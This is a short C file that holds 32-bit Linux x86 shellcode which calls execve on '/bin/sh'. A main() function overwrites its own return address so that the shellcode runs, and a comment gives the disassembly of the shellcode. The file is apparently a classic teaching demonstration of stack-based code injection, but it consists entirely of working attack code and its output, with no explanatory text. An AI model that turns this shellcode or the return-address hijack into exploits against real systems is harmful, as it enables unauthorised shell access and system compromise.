// exec ("/bin/sh") -- isn't it obvious?
char shellcode[] =
	"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
	"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
	"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

/* disassembly output of shellcode :
0x08049760 <shellcode+0>:       jmp    0x804978c <shellcode+44>
0x08049762 <shellcode+2>:       pop    %esi
0x08049763 <shellcode+3>:       mov    %esi,0x8(%esi)
0x08049766 <shellcode+6>:       movb   $0x0,0x7(%esi)
0x0804976a <shellcode+10>:      movl   $0x0,0xc(%esi)
0x08049771 <shellcode+17>:      mov    $0xb,%eax
0x08049776 <shellcode+22>:      mov    %esi,%ebx
0x08049778 <shellcode+24>:      lea    0x8(%esi),%ecx
0x0804977b <shellcode+27>:      lea    0xc(%esi),%edx
0x0804977e <shellcode+30>:      int    $0x80
0x08049780 <shellcode+32>:      mov    $0x1,%eax
0x08049785 <shellcode+37>:      mov    $0x0,%ebx
0x0804978a <shellcode+42>:      int    $0x80
0x0804978c <shellcode+44>:      call   0x8049762 <shellcode+2>
0x08049791 <shellcode+49>:      das    
0x08049792 <shellcode+50>:      bound  %ebp,0x6e(%ecx)
0x08049795 <shellcode+53>:      das    
0x08049796 <shellcode+54>:      jae    0x8049800
0x08049798 <shellcode+56>:      add    %cl,0xc35dec(%ecx)
*/